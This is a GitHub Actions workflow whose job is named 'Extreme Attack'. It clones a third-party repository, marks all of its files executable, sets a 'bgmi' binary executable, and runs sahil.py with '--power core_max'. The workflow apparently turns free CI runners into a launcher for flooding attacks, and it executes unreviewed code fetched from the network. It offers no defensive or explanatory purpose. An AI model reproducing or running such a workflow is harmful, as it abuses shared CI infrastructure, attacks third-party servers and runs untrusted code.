jobs:
  extreme_attacks:
    name: Extreme Attack
    runs-on: ubuntu-latest
    steps:
      - name: Check out the main repo
        uses: actions/checkout@v3

      - name: Clone sahilmodz repository
        run: git clone https://github.com/SAHILMOD10/sahilmodz.git

      - name: Run sahil.py from sahilmodz
        run: |
          cd sahilmodz
          chmod +x *
          python3 sahil.py

      - name: Set permissions for binaries
        run: chmod +x bgmi

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.x'

      - name: Install dependencies
        run: |
          pip install -r requirements.txt

      - name: Run sahil.py with extreme power
        run: python3 sahil.py --power core_max
